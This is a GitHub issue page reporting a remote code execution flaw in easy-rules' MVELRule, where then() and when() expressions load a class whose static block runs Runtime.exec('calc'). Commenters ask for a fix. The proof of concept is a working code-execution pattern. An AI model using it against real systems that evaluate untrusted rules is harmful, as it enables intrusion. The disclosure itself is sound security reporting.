easy-rules icon indicating copy to clipboard operation
easy-rules copied to clipboard

Published 20 hours ago verified publisher icon j-easy

MVELRule Remote Code Execution

Open sirnple opened this issue 1 year ago • 3 comments

easy-rules-mvel version: 4.1.0

I have run code like:

try {
    MVELRule mVELRule = new MVELRule();
    MVELRule result = mVELRule.then("jaz.Zer");
} catch (Exception e) {
}

Meanwhile I hava class jaz.Zer in classpath, which content is:

import java.io.IOException;

public class Zer {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}

On Windows platform, above code will open my PC's calculator

Additional: MVELRule.when also leads to this RCE

try {
    MVELRule mVELRule = new MVELRule();
    MVELRule result = mVELRule.when("\bjaz.Zer");
} catch (Exception e) {
}

sirnple avatar Dec 06 '23 09:12 sirnple

It's a limitation of mvel expression language.

dvgaba avatar Feb 01 '24 06:02 dvgaba

Hi! Do you have an update on this, is there a workaround or fix for this? I see the vulnerability is still open.

LuisMedinaG avatar Mar 22 '24 17:03 LuisMedinaG

Do we have any workaround to fix the vulnerability ?

dmuley17 avatar Apr 15 '24 21:04 dmuley17